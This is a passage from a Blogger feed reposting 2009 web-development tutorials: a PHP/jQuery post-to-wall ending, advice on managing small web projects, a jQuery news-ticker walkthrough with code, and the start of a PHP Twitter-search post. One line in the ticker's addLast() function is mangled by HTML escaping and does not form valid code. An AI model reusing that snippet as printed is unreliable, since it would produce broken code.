0, 153);"&gt;}&lt;/span&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;else&lt;/span&gt; &lt;span style="color: rgb(0, 0, 153);"&gt;{&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'0'&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt; &lt;span style="color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;That's all! Download the source code ready to use in your web projects.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/pskmjcsiqa"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/Sg_-cg8AxKI/AAAAAAAAEEA/xKmP9-LvnEQ/download.png" align="absmiddle" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Add a comment for questions or suggestions, thanks!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-939037511244282110?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/939037511244282110/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=939037511244282110' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/939037511244282110'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/939037511244282110'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-implement-post-to-wall-facebook.html' title='How to implement a Post-to-Wall Facebook-like using PHP and jQuery'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_TqPdHmAEwTM/SgNHu4at28I/AAAAAAAAEB4/h8roJ7qGOCU/s72-c/wall.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-9096275034122707551</id><published>2009-07-28T20:11:00.007-07:00</published><updated>2009-07-28T20:11:04.719-07:00</updated><title type='text'>How to manage a small web project: a simple approach</title><content type='html'>Some times ago I wrote a post about a &lt;a href="http://woork.blogspot.com/2009/01/structured-process-you-must-know-to.html"&gt;structured process you must know to develop a web application&lt;/a&gt; and many readers asked to me to write something simpler about how to manage a small web project. I think there are not general rules for that but, without doubt, a correct approach can help you manage your projects more efficently and achieve quickly the final result.&lt;br /&gt;&lt;br /&gt;I prepared this picture that illustrates a simple process with 3 main phases you can use as reference to manage a small web project:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh3.ggpht.com/_TqPdHmAEwTM/ShW1PmGPj9I/AAAAAAAAEGY/gRdxzxw-jMI/proj12.png" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;strong style="font-size: 15px;"&gt;1. Planning &lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Plan what you have to do, how you have to do it and in which time.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1.1 Define project scope&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;First step: Identify &lt;em&gt;4-5 high-level points&lt;/em&gt; which define the scope of your project. Don't underrate the importance of this step because if you are able to describe your project in a nutshell, it means you have a clear idea about what you have to do. So it will be simpler to realize it.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1.2. Identify main features to implement&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Second step: Identify main features of your web project and add, for each of them, some details such as relationships, general notes, ecc. For example image to have a simple project with only two main features: &lt;em&gt;user login&lt;/em&gt; and &lt;em&gt;profile management&lt;/em&gt;. You can represent them in this way:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh3.ggpht.com/_TqPdHmAEwTM/ShRq8CRm-aI/AAAAAAAAEFs/gHrJm3Ud9Is/mf1.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;That's a simplified example only to give you an idea.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1.3. Define sitemap&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Next step: define a &lt;em&gt;sitemap&lt;/em&gt; of your project with files and folder. Be accurate in identifying all files to implement (HTML/PHP page, JavaScript files,...) because they are final deliverables to implement.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/ShWpJI-ETMI/AAAAAAAAEGQ/wgJBb-NaY3c/sitemap.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1.4. Plan a daily to-do list&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Set &lt;em&gt;daily milestones&lt;/em&gt; using a simple to-do list. So everyday you'll know exactly what you have to do. In this way, you can easy monitor your progress measuring what you did a certain day and what had to do.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh5.ggpht.com/_TqPdHmAEwTM/ShW9fC_r0AI/AAAAAAAAEGc/mqlU6dx2Jig/prog3.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong style="font-size: 15px;"&gt;2. Developing and testing&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;In this phase: write HTML, CSS, PHP, JavaScript... code and test small portions of code during developing (preliminary test). So it wil be simpler find bugs and errors. When your web application is ready, stress it with a &lt;em&gt;final test&lt;/em&gt; to catch errors you didn't find during preliminary test which cause unexpected behaviors .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong style="font-size: 15px;"&gt;3. Publishing&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Now you are ready to publish your project on-line. When your website or web application is on-line do a last test on what you published to assure you that it's all ok. That's all!&lt;br /&gt;&lt;br /&gt;If you have some suggestion please leave a comment, thanks!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h5&gt;External links&lt;/h5&gt;Take also a look at these links:&lt;br /&gt;&lt;br /&gt;- &lt;a href="http://en.wikipedia.org/wiki/Software_development_methodologies"&gt;Software development methodology&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://en.wikipedia.org/wiki/Agile_software_development"&gt;Agile software development - Wikipedia, the free encyclopedia&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://agilemanifesto.org/"&gt;Manifesto for Agile Software Development&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h5&gt;Related posts&lt;/h5&gt;- &lt;a href="http://woork.blogspot.com/2009/01/structured-process-you-must-know-to.html"&gt;Structured process you must know to develop a web application&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2009/02/simple-process-to-estimate-time-and.html"&gt;Simple process to estimate times and costs in a web project&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-9096275034122707551?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/9096275034122707551/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=9096275034122707551' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/9096275034122707551'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/9096275034122707551'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-manage-small-web-project-simple.html' title='How to manage a small web project: a simple approach'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh3.ggpht.com/_TqPdHmAEwTM/ShW1PmGPj9I/AAAAAAAAEGY/gRdxzxw-jMI/s72-c/proj12.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-8183664269414881445</id><published>2009-07-28T20:11:00.005-07:00</published><updated>2009-07-28T20:11:03.638-07:00</updated><title type='text'>How to implement a news ticker with jQuery and ten lines of code</title><content type='html'>After my &lt;a href="http://woork.blogspot.com/2008/07/fantastic-news-ticker-newsvine-like.html"&gt;previous posts&lt;/a&gt; about how to implement a &lt;em&gt;news ticker&lt;/em&gt; with MooTools I received a lot of emails from my readers that asked to me to implement a similar feature with jQuery, including fade in and fade out effects, in the simpler possible way. So in this post I want to illustrate you how to implement a nice news ticker using jQuery and just ten lines of Javascript code. The result is something like this:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/ShxEgKHJBLI/AAAAAAAAEHQ/CPtCEIThrqI/slider.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;I suggest you to &lt;a href="http://woorktuts.110mb.com/newstickerjq/index.html"&gt;take a look at this live preview&lt;/a&gt; and download the source code to understand how it works. In the source code I added a file called &lt;em&gt;base.html&lt;/em&gt; that contains the basic structure of this ticker you can quickly reuse and customize in your web project.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/qt1g82jkgc"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/Sg_-cg8AxKI/AAAAAAAAEEA/xKmP9-LvnEQ/download.png" align="absmiddle" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;A little introduction&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;Step 1&lt;/em&gt;: image to have a &lt;span style="font-weight: bold; color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;ul&amp;gt;&lt;/span&gt; list with ID = &lt;em&gt;listticker&lt;/em&gt;. This list contains some list elements &lt;span style="font-weight: bold; color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;li&amp;gt;&lt;/span&gt; (in this case: My News 1, My News 2, ...). First step is: get the first element of the list, save its content into a var and remove it using a fade out effect.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh4.ggpht.com/_TqPdHmAEwTM/ShxEgIfnShI/AAAAAAAAEHM/vjAdTtpMmQU/slider1.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;You can get the HTML code contained into the first element of the list (&lt;em&gt;#listticker&lt;/em&gt;) and assign it to a var (&lt;em&gt;first&lt;/em&gt;) using this simple code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;first &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; $&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'ul#listticker li:first'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.html&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;()&lt;/span&gt;;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;To use fade out effect and remove the element you can use this code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;.fadeOut&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'slow'&lt;/span&gt;, function&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;() {&lt;/span&gt;$&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;this&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.remove&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;();});&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;Step 2&lt;/em&gt;: now you have to add the content saved into the var &lt;em&gt;first&lt;/em&gt; to the end of the list:&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh5.ggpht.com/_TqPdHmAEwTM/ShxGTcQ3oII/AAAAAAAAEHY/VBr4KQnCTnM/slider2.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;You can use this simple code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;$&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'ul#listticker'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.append&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;first&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;...where &lt;span style="color: rgb(0, 153, 0); font-weight: bold;font-family:courier new;" &gt;first&lt;/span&gt; is the var you used to save the content of the first element in the step 1.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;em&gt;Step 3&lt;/em&gt;: Now you have to move up the content of the list (My News 2 is now the first element of the list) and repeat the entire process from the step 1.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/ShxOY__SReI/AAAAAAAAEHc/55XdP-I2Lro/slider4.png" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;In Javascript code section of this tutorial I used &lt;span style="color: rgb(51, 153, 153);"&gt;setInterval&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;()&lt;/span&gt;&lt;/span&gt; to repeat the process every 3 seconds (3.000 milliseconds). Ok, now take a look at HTML and Javascript code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;HTML Code&lt;/strong&gt;&lt;br /&gt;HTML code is really simple. The only thing you have to do is adding an &lt;span style="font-weight: bold; color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;ul&amp;gt;&lt;/span&gt; list with ID = &lt;em&gt;listticker&lt;/em&gt; and some list elements:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;ul id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"listticker"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;&lt;div style="margin-left: 14px;"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;li&amp;gt;&lt;/span&gt;My News 1&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;li&amp;gt;&lt;/span&gt;My News 2&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/li&amp;gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;li&amp;gt;&lt;/span&gt;My News 3&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;li&amp;gt;&lt;/span&gt;My News 4&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;li&amp;gt;&lt;/span&gt;My News 5&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/ul&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Remeber to add into the tag &amp;lt;head&amp;gt; of the page where you want to implement this ticker a link to jQuery:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;src=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"jquery.js"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Javascript Code&lt;/strong&gt;&lt;br /&gt;Take a look at the follow code. I implement 2 functions &lt;span style="font-weight: bold; color: rgb(0, 0, 153);font-family:courier new;" &gt;removeFirst()&lt;/span&gt; and &lt;span style="font-weight: bold; color: rgb(0, 0, 153);font-family:courier new;" &gt;addLast()&lt;/span&gt;. Each function contains five lines of code. Total lines for "conceptual" code: 10 lines! I promised! :)&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;$&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;document&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.ready&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;function&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(){&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; first &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;0&lt;/span&gt;;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; speed &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;700&lt;/span&gt;;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; pause &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;3000&lt;/span&gt;;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt;        &lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;function&lt;/span&gt; removeFirst&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(){&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 24px;"&gt;            first &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; $&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'ul#listticker li:first'&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;)&lt;/span&gt;.html&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;();&lt;/span&gt;&lt;br /&gt; $&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'ul#listticker li:first'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;&lt;br /&gt; .animate&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;({&lt;/span&gt;opacity&lt;span style="color: rgb(51, 102, 255);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; 0&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;}&lt;/span&gt;, speed&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;&lt;br /&gt; .fadeOut(&lt;span style="color: rgb(51, 102, 255);"&gt;'slow'&lt;/span&gt;, function&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;() {&lt;/span&gt;$&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;this&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;)&lt;/span&gt;.remove&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;();});&lt;/span&gt;&lt;br /&gt; addLast&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;first&lt;span style="color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;/div&gt;        &lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;function&lt;/span&gt; addLast&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;first&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;){&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 24px;"&gt;            last &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;'&lt;li style="display: none;"&gt;'+&lt;/li&gt;&lt;/span&gt;first+&lt;span style="color: rgb(51, 102, 255);"&gt;''&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;;&lt;/span&gt;&lt;br /&gt; $&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'ul#listticker'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.append&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;last&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;&lt;br /&gt; $&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'ul#listticker li:last'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;&lt;br /&gt; .animate&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;({&lt;/span&gt;opacity&lt;span style="color: rgb(51, 102, 255);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; 1&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;}&lt;/span&gt;, speed&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;&lt;br /&gt; .fadeIn&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'slow'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;&lt;/div&gt;        &lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;interval &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(51, 153, 153);"&gt;setInterval&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;removeFirst, pause&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;});&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;In the last line I used:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;interval &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(51, 153, 153);"&gt;setInterval&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;removeFirst, pause&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;...it calls the function &lt;span style="font-weight: bold; color: rgb(0, 0, 153);font-family:courier new;" &gt;removeFirst()&lt;/span&gt;every 3 seconds (&lt;span style="color: rgb(255, 0, 0);"&gt;3000&lt;/span&gt; milliseconds) and in this way I create ad infinite loop.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/qt1g82jkgc"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/Sg_-cg8AxKI/AAAAAAAAEEA/xKmP9-LvnEQ/download.png" align="absmiddle" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you have suggestions to improve the code please leave a comment. Thanks!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h5&gt;Related Posts&lt;/h5&gt;If you are interested on other about this topic take a look at the following posts:&lt;br /&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2008/07/news-ticker-with-horizontal-scroller.html"&gt;News ticker with horizontal scrolling&lt;br /&gt;&lt;/a&gt;- &lt;a href="http://woork.blogspot.com/2008/07/fantastic-news-ticker-newsvine-like.html"&gt;Fantastic News Ticker Newsvine-like&lt;br /&gt;&lt;/a&gt;- &lt;a href="http://woork.blogspot.com/2008/10/automatic-news-ticker-with-vertical.html"&gt;Automatic news ticker with vertical scrolling and Start/Resume options&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2008/10/joomla-extension-news-ticker-vine.html"&gt;Joomla! extension: super news ticker&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-8183664269414881445?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/8183664269414881445/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=8183664269414881445' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8183664269414881445'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8183664269414881445'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-implement-news-ticker-with.html' title='How to implement a news ticker with jQuery and ten lines of code'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh6.ggpht.com/_TqPdHmAEwTM/ShxEgKHJBLI/AAAAAAAAEHQ/CPtCEIThrqI/s72-c/slider.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-158978601546306521</id><published>2009-07-28T20:11:00.003-07:00</published><updated>2009-07-28T20:11:01.916-07:00</updated><title type='text'>Simple PHP Twitter Search ready to use in your web projects</title><content type='html'>After my previous tutorial that illustrated how to implement a &lt;a href="http://woork.blogspot.com/2009/06/super-simple-way-to-work-with-twitter.html"&gt;super simple way to work with Twitter API (PHP + CSS)&lt;/a&gt; I received a lot of emails from my readers that asked to me to write a post about how to implement a &lt;em&gt;simple Twitter search&lt;/em&gt; and display search results in a web page with a custom format. So in this tutorial I want to illustrate how you can implement that using a very useful Twitter Search API for PHP developed by &lt;a href="http://davidbillingham.name/"&gt;David Billingham&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Using this simple method you can obtain, just in some lines of PHP and CSS code, awesome results like this:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh3.ggpht.com/_TqPdHmAEwTM/SkZ-nDCE1xI/AAAAAAAAEsI/c1IGyxqI10I/tweet1.png" style="border: 1px solid rgb(222, 222, 222); padding: 6px;" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;You can download the source code at the &lt;a href="http://www.box.net/shared/8h6usxihi2"&gt;following link&lt;/a&gt; and reuse it for free in your web projects just in some seconds!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/8h6usxihi2"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/Sg_-cg8AxKI/AAAAAAAAEEA/xKmP9-LvnEQ/download.png" align="absmiddle" border="0" 